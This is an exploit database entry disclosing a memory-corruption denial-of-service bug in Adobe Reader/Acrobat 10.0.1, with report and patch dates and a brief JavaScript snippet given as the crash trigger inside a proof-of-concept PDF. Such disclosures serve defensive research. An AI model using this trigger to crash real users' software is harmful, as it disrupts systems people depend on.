Adobe Reader/Acrobat 10.0.1 DoS Exploit

ID EDB-ID:17405
Type exploitdb
Reporter Soroush Dalili
Modified 2011-06-16T00:00:00


Adobe Reader/Acrobat 10.0.1 DoS Exploit. Dos exploit for windows platform

                                            Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) -
PoC: Tested on Windows 7 SP1 and Windows XP SP3

PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
		var temp;
		for(var i=0;i<=8;i++)
		var result = temp;
			viewState= result;
		dirty; // Important!